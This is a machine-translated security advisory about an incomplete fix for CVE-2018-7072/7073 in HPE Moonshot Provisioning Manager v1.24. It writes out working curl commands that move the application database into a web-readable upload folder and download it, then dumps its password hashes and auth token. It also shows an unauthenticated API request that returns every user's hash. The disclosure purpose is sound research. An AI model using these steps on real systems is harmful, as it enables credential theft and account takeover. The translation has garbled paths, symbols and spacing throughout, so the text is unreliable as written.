在开发一个Nessus插件cve - 2018 - 7072和cve - 2018 - 7073的修复,站得住脚的发现HPE月球探测器Provisioning Manager v1.24 HPE咨询HPESBHF03843是不完整的。在v1.24,/ opt / hp /月球探测器/上传/和许多其他目录由用户仍可写的月球探测器:
#发现/ maxdepth 5类型d用户月球探测器烫/ u + w printf“% M % u % p \ n " 2 > / dev / null drwx——月球探测器/home/moonshot drwxr-xr-x月球探测器/var/lib/moonshot drwxr-xr-x月球探测器/ opt / hp /月球探测器drwxr-xr-x月球探测器/ opt / hp /月球探测器/包括drwxr-xr-x月球探测器/ opt / hp /月球探测器/回购drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ switch_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ prov_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/小叮当drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ moonshot_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ task_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/升级drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/根drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ os_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ user_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ pydeps drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ conf drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ tclient drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ bin drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/答案drwxr-xr-x月球探测器/ opt / hp /月球探测器/上传drwxr-xr-x月球探测器/ opt / hp /月球探测器/ logs drwxr-xr-x月球探测器/ opt / hp /月球探测器/ bin drwxr-xr-x月球探测器/ opt / hp /月球探测器/ bin / __pycache__ drwxr-xr-x月球探测器/ opt / hp /月球探测器/ lib drwxr-xr-x月球探测器/ opt / hp /月球探测器/ lib / python3.3
例如,攻击者可以将db。sqlite3文件/var/lib/moonshot / opt / hp /月球探测器/上传/:
curl kd“isofile.savepath =美元/ var / lib /月球探测器/ db.sqlite3&isofile.filename = db。sqlite3“https:// < mpm_host > /目录/ khuploadfile。身体cgi < html > < > < p >文件上传成功< p > < /身体> < / html >
然后攻击者可以获取数据库。sqlite3文件:
curl - k - o db美元。sqlite3的https:// < mpm_host > /上传/ db。sqlite3的% % % Xferd收到总平均速度总花时间时间时间当前Dload上传速度100 95232 100 95232 0 0 294 k 0 -: -: - - - - -: -: - - - - -:—:, 567 k
db。sqlite3的数据库文件是“小叮当”Django项目,包含各种信息的web应用程序:https:// < mpm_host > /。例如,它包含有关配置用户信息和登录用户的身份验证令牌:
美元sqlite3 db。sqlite3 SQLite版本3.6.20输入”。帮助”的指令输入SQL语句终止”;“sqlite > .table auth_group moonshot_mgr_addressrecord auth_group_permissions moonshot_mgr_chassis auth_permission moonshot_mgr_chassisauthtoken auth_user moonshot_mgr_nic auth_user_groups moonshot_mgr_node auth_user_user_permissions moonshot_mgr_switch authtoken_token os_mgr_configurationfile django_admin_log os_mgr_operatingsystem django_content_type os_mgr_update django_migrations prov_mgr_backup django_session prov_mgr_clone djkombu_message prov_mgr_install djkombu_queue task_mgr_vlanassignmentrecord sqlite > .header sqlite > select * from auth_user;id密码| | is_superuser |用户名| first_name | last_name |电子邮件| is_staff | is_active | date_joined叫| last_login 1 | pbkdf2_sha256 gmAgQbL6t1YCbkw6qnl kTvcnCFdQyTE美元20000美元+ sGg9qKkf8wSQdxC + fhR4fwI = | 1 | user1 |用户数量1 | | | 1 | 1 | 2018-08-01 22:43:43.292870 | 2018-08-21 22:28:15.787135 2 | pbkdf2_sha256 eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc V0bHk71d7xte美元20000美元= | 1 | user2 |用户2号| | | 1 | 1 | 2018-08-21 22:47:59.549245 | sqlite > select * from authtoken_token;关键| |创建user_id e8419331029d8b4d24369cdab9a69b6d97bf3bf0 | 2018-08-21 22:27:23.451159 | 1
这些信息可以帮助攻击者发动进一步攻击。
另外,因为/var/lib/moonshot/db.sqlite3被转移到/ opt / hp /月球探测器/上传/不再有效,用户可以登录到web UI https:// < mpm_host > /。
与URL端点站不住脚还发现另一个安全问题/ / api /用户,它允许一个未经身份验证的远程攻击者获取所有用户帐户与敏感信息,包括密码散列:
curl - k美元的https:// < mpm_host > / api /用户/ [{“url”:“https: / < mpm_host > / < / api /用户/ 1 /”、“用户名”:“user1”、“first_name”:“用户第一”、“密码”:“pbkdf2_sha256 gmAgQbL6t1YCbkw6qnl kTvcnCFdQyTE美元20000美元+ sGg9qKkf8wSQdxC + fhR4fwI =”、“电子邮件”:“”、“is_staff”:真的,”is_active”:真的,”is_superuser”:真的,叫“last_login”:“2018 - 08 - 21 t22:28:15.787135z”、“date_joined”:“2018 - 08 - 01 t22:43:43.292870z”}, {:“url https://
/ api /用户/ 2 /”、“用户名”:“user2”、“first_name”:“用户2号”、“密码”:“pbkdf2_sha256 eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc V0bHk71d7xte美元20000美元=”、“电子邮件”:“”、“is_staff”:真的,”is_active”:真的,”is_superuser”:真的,叫“last_login”:空,“date_joined”:“2018 - 08 - 21 t22:47:59.549245z“})